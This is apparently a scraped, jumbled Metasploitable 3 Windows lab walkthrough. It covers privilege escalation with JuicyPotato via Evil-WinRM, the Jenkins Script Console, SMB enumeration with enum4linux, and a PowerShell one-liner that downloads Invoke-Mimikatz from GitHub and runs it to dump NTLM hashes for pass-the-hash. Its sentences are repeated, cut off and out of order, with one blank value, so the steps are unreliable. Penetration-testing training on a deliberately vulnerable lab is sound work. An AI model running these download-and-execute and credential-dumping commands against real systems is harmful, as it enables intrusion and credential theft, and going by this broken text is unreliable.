View the Main Menu
Upload JuicyPotato.exe via Evil-WinRM:
whoami /priv # Check if SeImpersonatePrivilege is enabled (It usually is!) If you landed as a non-admin user but have SeImpersonatePrivilege , you can elevate to SYSTEM. metasploitable 3 windows walkthrough
Developed by Rapid7 in collaboration with Vagrant, Metasploitable 3 is a deliberately vulnerable Windows machine designed to teach real-world Active Directory exploitation, misconfiguration management, and post-exploitation tactics. This is not a simple "click-and-exploit" box. It requires understanding Windows services, firewall rules, and privilege escalation vectors. Upload JuicyPotato
Once in Jenkins, go to "Manage Jenkins" -> "Script Console". This is a Groovy script executor. You can run: You can run: # Download Mimikatz iex (New-Object Net
# Download Mimikatz iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1') Invoke-Mimikatz -DumpCreds NTLM hashes for Administrator , vagrant , and the machine account. You can now pass-the-hash to any other machine on the fake network. Finding Flags Metasploitable 3 has "flags" hidden in the file system.
enum4linux -a 192.168.56.102 Look for the share list. You will likely see C$ (Admin share) and ADMIN$ . But also look for a share named vulnshare or similar. Note the OS version: . This OS is out of support—perfect. Part 3: The Web Attack Surface (Low Hanging Fruit) 3.1 IIS Default Page (Port 80) Navigate to http://192.168.56.102 in Firefox. You see the IIS welcome screen. Not much here yet, but directory busting is required.
